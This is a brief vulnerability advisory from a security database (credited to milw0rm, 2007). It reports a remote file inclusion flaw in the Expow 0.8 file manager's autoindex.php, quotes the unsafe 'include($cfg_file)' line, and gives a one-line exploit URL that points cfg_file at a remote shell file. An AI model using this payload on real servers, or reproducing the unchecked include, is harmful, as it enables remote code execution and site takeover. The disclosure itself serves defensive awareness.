Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:16777
HistoryApr 19, 2007 - 12:00 a.m.

Expow 0.8 File manager Autoindex.php (cfg_file) Remote File Inclusion Vulnerability

2007-04-1900:00:00
vulners.com
25

Expow 0.8 File manager Autoindex.php (cfg_file) Remote File Inclusion Vulnerability


found by : mdx

Download script : http://sourceforge.net/project/downloading.php?group_id=29595&use_mirror=kent&filename=expow-0.8.tar.gz&92927218

file name : autoindex.php


Ýncluded line ;

if (!include($cfg_file))


Exploit :

http://site.com/[path]/autoindex.php?cfg_file=shellmdx.txt?

milw0rm.com [2007-04-12]